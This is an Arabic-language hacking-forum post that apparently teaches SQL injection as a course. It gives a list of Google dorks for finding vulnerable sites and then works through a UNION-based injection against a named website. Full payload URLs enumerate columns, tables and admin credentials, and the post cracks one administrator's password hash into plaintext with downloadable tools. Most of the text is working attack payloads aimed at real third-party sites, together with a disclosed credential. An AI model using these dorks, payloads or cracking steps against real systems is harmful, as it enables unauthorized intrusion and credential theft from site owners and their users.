مرحبا بجميع الاخوة الكرام
lمقدمة الان نذهب للمهم اولا سوف نضع تعريفا لما يسمى بحقن قواعد البيانات والمصطلحات الاساسية فيه
: التعريف
أولا تعريف قاعدة البيانات
ساضرب لكم مثال لكي تفهمو ما معنى قاعدة بيانات لو طلب منك تخزين بيانات مجموعة من العاملين ستحتاج في بياناتهم الى اسمهم الاول مثلا واللقب ورقم الهاتف ثم العنوان والبريد الالكتروني هذه التي اعطيتك اياها تسمى حقول القاعدة والقاعدة ككل عنوانها سيكون بيانات العاملين اذا اصبح لدينا حقول فارغة ستبدا بتعبئتها لتصبح عندك قاعدة بيانات نشيطة ولو طلبت منك استخراج بيانات الموظف صاحب رقم الهاتف كذا ستلجا الى حقل الهاتف ثم تبحث عن الرقم المطلوب عندما تجده ستتجه الى خانة الاسم المقابل لهذا الرقم ليظهر لك صاحب الرقم
هذا هو الشرح العام لمعنى قاعدة بيانات
وكل منتدى أو موقع ايا كان هو عبارة عن اعضاء ومواضيع وردود بشكل عام هذه تعتبر هي جداول المنتدى بالاضافة الى غيرها من الجداول لذلك حتى يتم تخزين هذه الجداول يتطلب منا انشاء قاعدة لتحتوي على هذه الجداول وغيرها ويصبح لدينا منتدى
المسؤول عن قاعدة البيانات كل من يملك صلاحية الدخول الى لوحة تحكم الموقع ليضيف من هنالك قاعدة جديدة او يجري تعديلات على القاعدة
والجداول المذكورة سابقا من مواضيع وردود نحن لا تهمنا نحن من يهمنا الجداول التي تحتوي على اليوزر أي اسم الادمين يعني مدير الموقع والباسوورد يعني كلمة السر
وقواعد البيانات يقوم بتصميمها مبرمجون ولكن في بعض الاحيان هؤلاء المبرمجون يرتكبون أخطاء ومن هذه الاخطاء خطأ يسبب ثغرة الحقن ويتم استغلال ثغرة الحقن عن طريق توجيه اوامر واستعلامات الى القاعدة ببساطة اكثر يعني كتابة اوامر يعني اكواد وكلمات بعد المتغير لا تعرف ماهو المتغيير المتغير هو الرقم الذي يأتي في رابط
= الموقع المصاب بعد علامة
مثلا
www.xxxxxxxxxx.com/inscription.php?id=14
الرقم المكتوب بالاحمر هو المتغير
يعني لاختراق الموقع نقوم بكتابة أوامر معينة هي الاستعلامات بعد الرقم وهذه الاوامر سنتطرق اليها فيما بعد
وثانيا هناك مصطلح الدوركات وهي اكواد توضع في محركات البحث للبحث عن اهدافنا اي مواقع مصابة
تكلمنا في المقدمة عن حقن قواعد البيانات وتعريفها وبعض المصطلحات
الان سنبين كيفية البحث عن المواقع المصابة في صديقنا المقرب google
يتم ذلك بطريقتين
:1_____الطريقة الاولى ببساطة البحث في المنتديات مثلا بكتابة:
Sqlمواقع مصابة بثغرات
أو أي شيء اخر يكفي ان تشغل عقلك
2_____الطريقة الثانية:
هي بكتابة مايسمى بالدوركات وقد شرحنا معناها في مقدمة الدورة
واليكم بعض الدوركات
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurllay_old.php?id=
inurl:declaration_more.php?decl_id=
inurlageid=
inurl:games.php?id=
inurlage.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurlgl_inet.php?ogl_id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
يكفي ان تكتبوها في محرك البحث وتظهر المواقع المصابة ويمكنكم البحث عن دوركات اخرى في محرك البحث مثلا بكتابة دوركات للبحث عن المواقع المصابة بثغرة الحقن
الان بحثنا عن المواقع المصابة ولكن علينا ان نتأكد من انها مصابة ويتم ذلك بوضع هذه العلامة (') بعد المتغير ولقد تم شرح ما معنى المتغير في المقدمة
الان عرفنا كيف نبحث عن الموقع المصاب الان نعرف اول خطوة في حقن قواعد البيانات أولا نختار موقع لنجرب عليه عندي موقع مصاب
http://www.bananecoco.com/achat/index.php?id=17
لنتاكد من انه مصاب نضع علامة '
كما شرحنا فس السابق اي يصبح الرابط هكذا
http://www.bananecoco.com/achat/index.php?id=17'
تابع الصورة
كما ترون ظهر الخطأ هاذا يعني ان الموقع مصاب
الان عرفنا ان في الموقع ثغرة حقن والان علينا استغلالها
اول ما سنفعله هو معرفة عدد الاعمدة في قاعدة البيانات
ويتم ذلك بامر
في مكان النقاط نكتب رقم اولا نبدا بالرقم واحد اي يصبح الرابط هكذا
كود PHP:
http://www.bananecoco.com/achat/index.php?id=17 order by 1--
تابع الصورة
كما ترون لا يوجد هناك خطأ لتستوعبو الامر اننا نوجه اوامر للقاعدة لنسحب منها بيانات الادمن يعني لو كتبنا امرا خاطئا سيضهر لنا خطأ مثلما ضهر لنا في السابع يعني لو كتبنا عدد اعمدة اكثر من التي في القاعدة يظهر لنا خطء وبالتجريب نستطيع معرفة عدد الاعمدة مثلا نكتب order by 20—
يعني يصير الرابط هكذا
كود PHP:
http://www.bananecoco.com/achat/index.php?id=17 order by 20--
شوفو ماذا حدث
ظهر لنا الخطأ هاذا يعني ان عدد الاعمدة اقل من 20
الان ما ذا نفعل نستمر في انقاص الارقام
يعني نتابع تغيير الارقام تنازليا
يعني مثلا هكذا
كود PHP:
http://www.bananecoco.com/achat/index.php?id=17 order by 19--
ظهر لن الخطا
ثم
كود PHP:
http://www.bananecoco.com/achat/index.php?id=17 order by 18--
ايضا ظهر لنل الخطا نستمر بالانقاص حتى لايضهر لنا الخطا
نجرب كود PHP:
--http://www.bananecoco.com/achat/index.php?id=17 order by 14
ظهر لنا الخطأ
كود PHP:
http://www.bananecoco.com/achat/index.php?id=17 order by 13--
الان لم يظهر لنا الخطأ يعني القاعدة فيها 13 عمود
الان عرفنا عدد الاعمدة الان ناتي للخطوة التي بعدها قلنا في السابق ان الموقع مصاب والحقيقة هي ان بعض الاعمدة في القاعدة مصابة وليس كلها اذن علينا ان نعرف العود المصاب ولذلك نضيف هاذا الاستعلام الى الرابط
+union+select+الاعمدة الموجودة في الموقع--
يعني في حالتنا الاعمدة 13 يعني الامر يكون هكذا
+ كود PHP:
union+select+1,2,3,4,5,6,7,8,9,10,11,12,13--
وهناك شيء اخر نضيف علامة – قبل المتغير يعني يصير الرابط هكذا
كود PHP:
http://www.bananecoco.com/achat/index.php?id=-17+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13--
تابع الصورة
كما ترون في الصورة ظهرت ارقام 2و3و5
هذه الارقام هي الاعمدة المصابة في هاذا الموقع نحن نحتاج واحدا فقط انا اخترت العمود 3
نتابع
الان عرفنا عمودا مصابا الان يجب ان نعرف اصدار قاعدة البيانات اذا كان 4 او 5
ولذلك نكتب
version()
في مكان العمود المصاب يعني يصير الرابط هكذا
كود PHP:
http://www.bananecoco.com/achat/index.php?id=-17+union+select+1,2,version(),4,5,6,7,8,9,10,11,12,13--
تابع الصورة
كما ترون مكتوب
5.0.44-log
يعني اصدار رقم 5
لوطلعلك رقم 5 تابع الخطوات الاتية ظهرلك ولورقم 4 توقف وانتضر ساشرح ذلك فيما بعد
المهم عرفنا اصدار القاعدة
الان نضيف امر كود PHP:
concat(table_name,0x3a,column_name,0x3a,table_schema)
في مكان المود المصاب
و
كود PHP:
+from+information_schema.columns—
في اخر الرابط
يعني يصبح الرابط هكذا كود PHP:
http://www.bananecoco.com/achat/index.php?id=-17+union+select+1,2,concat(table_name,0x3a,column_name,0x3a,table_schema),4,5,6,7,8,9,10,11,12,13+from+information_schema.columns--
وتذكر اذا طلع لك خطء يعني ارتكبت خطا واذا لم يظهر أي خطا يعني ان استغلالك صحيح
وتذكر ايضا انه يمكن ان تضهر النتائج في أي مكان في الاعلى او الاسفل وفي أي مكان
الان نضيف هاذا الامر
كود PHP:
+where+column_name+LIKE+CHAR(37, 112, 97, 115, 37)--
هاذا الامر لمعرفة اسم اليوزر يعني يصبح الرابط هكذا
كود PHP:
http://www.bananecoco.com/achat/index.php?id=-17+union+select+1,2,concat(table_name,0x3a,column_name,0x3a,table_schema),4,5,6,7,8,9,10,11,12,13+from+information_schema.columns+where+column_name+LIKE+CHAR(37, 112, 97, 115, 37)--
تابع الصورة
كما ترون ظهر لنا في اول النتائج
utilisateurs
users وليس دائما يكون هكذا ممكن تجده
او أي اسم اخر يعني على حسب لغة الموقع اذا كيف تعرفه سهلة لانه ياتي في الاول يعني الاول في النتائج
الان ناخذ الاسم الذي وجدناه ونتوجه لموقع
http://www.waraxe.us/sql-char-encoder.html
تابع الصورة
[url=http://www.herosh.com][/url
ناخذ الكود كما شاهدتم
كان الرابط هكذا
كود PHP:
http://www.bananecoco.com/achat/index.php?id=-17+union+select+1,2,concat(table_name,0x3a,column_name,0x3a,table_schema),4,5,6,7,8,9,10,11,12,13+from+information_schema.columns+where+column_name+LIKE+CHAR(37, 112, 97, 115, 37)--
الذي مكتوب بالاحمر نحذفه ونحط بدله
+where+table_name=هنا الكود الذي اخذناه من الخطوة السابقة
يعني في حالتنا هكذا
كود PHP:
+where+table_name=0x7574696c6973617465757273--
يعني يصير الرابط هكذا
كود PHP:
http://www.bananecoco.com/achat/index.php?id=-17+union+select+1,2,concat(table_name,0x3a,column_name,0x3a,table_schema),4,5,6,7,8,9,10,11,12,13+from+information_schema.columns+where+table_name=0x7574696c6973617465757273--
group_ ثم نضيف كلمة
قبل concat
في الرابط يعني يصير الرابط هكذا
كود PHP:
http://www.bananecoco.com/achat/index.php?id=-17+union+select+1,2,group_concat(table_name,0x3a,column_name,0x3a,table_schema),4,5,6,7,8,9,10,11,12,13+from+information_schema.columns+where+table_name=0x7574696c6973617465757273--
تابع الصورة
كما ترون ناخذ
utilisateurs و nom_utilisateur وmot_passe
يعني نحن اخذنا اسم اليوزر واسم كلمة السر واسم اليوزرنايم
وليس في كل مرة تكون هكذا كما قلت لكم يعني حسب لغة الموقع
والان نرجع للرابط الاول
http://www.bananecoco.com/achat/inde...,group_concat(table_name,0x3a,column_name,0x3a,table_schema),4,5,6,7,8,9,10,11,12,13+from+information_schema.columns+where+table_name=0 x7574696c6973617465757273--
نستبدل ماهو ملون بالاحمر باسم اليوزر يعني في حالتنا utilisateurs
وماهو بالاخضر بكلمة السر يعني في حالتنا
Mot_passe
وماهو بالازرق باليوزر نايم يعني في حالتنا
Nom_utilisateur
يعني يصبح الرابط هكذا
كود PHP:
http://www.bananecoco.com/achat/index.php?id=-17+union+select+1,2,group_concat(nom_utilisateur,0x3a,mot_passe),4,5,6,7,8,9,10,11,12,13+from+utilisateurs--
تابع الصورة
مبروك عليك وفي حالتنا هذه هناك في الموقع عدة مديرين نحن نكتفي بواحد
palmier نختار
كلمة مروره المشفرة
054066b810990de8
ولكن كلمة السر مشفرة وهاذا مايسمى بالهاش ولمعرفة كلمة السر علينا فك تشفير الهاش ولفكه يجب علينا اولا ان نعرف نوعه وذلك من خلال هذه الاداة
http://www.mediafire.com/?crm0zzi13j59lhn
حملها وافتحها في الاول تظهر لك صورة من الوجوه الضاحكة اضغط فيها وبعد الضغط تابع الصورة
كما ترون ظهر لنا نوعه وهو my sql
اذا ضهر لك هاذا النوع يمكنك فكه بهذه الاداة
تابع الشرح
الأداة اسمها
mysqlfast.exe
تمت ترجمتها لعيونكم و رفعهاعلى الميديا
http://www.mediafire.com/?rd92kul4iacbqxo
استعمال الأداة
ندخل على موجة الدوس :
start >>> run >>> cmd
و ندخل إلى مسار الأداة :
أنا حاطط الأداة في هذا المسار
C:\mysqlfast.exe
نكتب اسم الأداة :
mysqlfast.exe
نشرح طريقة استعمالها
أمر استعماله والتطبيق على الهاش
اكتب هاذا الامر في الدوس
mysqlfast.exe 054066b810990de8 x
وهذا الناتج
تم الفك مبروك
كلمة السر هي
chamax
هاذا ان كان من نوع my sql
ويمكن ان يكون من نوع md5
وفكه سهل اذهب على موقع
hashkiller.com
اولا سجل في الموقع ههههه لن اشرح ذلك بالصور لانني اضن ان الكل يعرف طريقة التسجيل
بعد التسجيل اذهب على webcrack
اكتب الهاش واضغط على webcrack
وستضهر لك كلمة السر في الاسفل
اما اذا كان من نوع اخر ابحث عن ادوات اخرى لفكه
المهم يا اخواني الان حصلنا على اليوزر نايم والباس
والان تذكرتم اني قلت لكم
اذا كان اصدار القاعدة 5 تابعو معي الان اذا وجدت اصدار القاعدة 4 هناك طرق لحقنه ولكني اخبرك دعك منها وحان وقت نوع اخر من الحقن وهو الحقن الاوتوماتيكي وافضل برناج هو برنامج هافيج لن اعمل له شرح لانه موجود في المنتدى الرابط
http://www.vbspiders.com/vb/t41063.html
ملاحظة البرنامج يحقن بجميع الانواع يعني ايضا الاصدار 5
وفي الاخير بما انك حصلت على كلمة السر الان يجب عليك ايجاد مسار لوحة التحكم وهاذا ايضا ببرنامج havij
وذلك ايضا مشروح في الرابط العلوي
في الاخير اقدم هاذا الموضوع لجميع الاعضاء الكرام وارجو التقييم تقديرا لتعبي
تم الشرح من neo-m
neo@vbspiders.com
lfj]H ,gh juvt adzh ikh f]hdj; h]og ,sjov[ ofdvh a;v a;vh ikh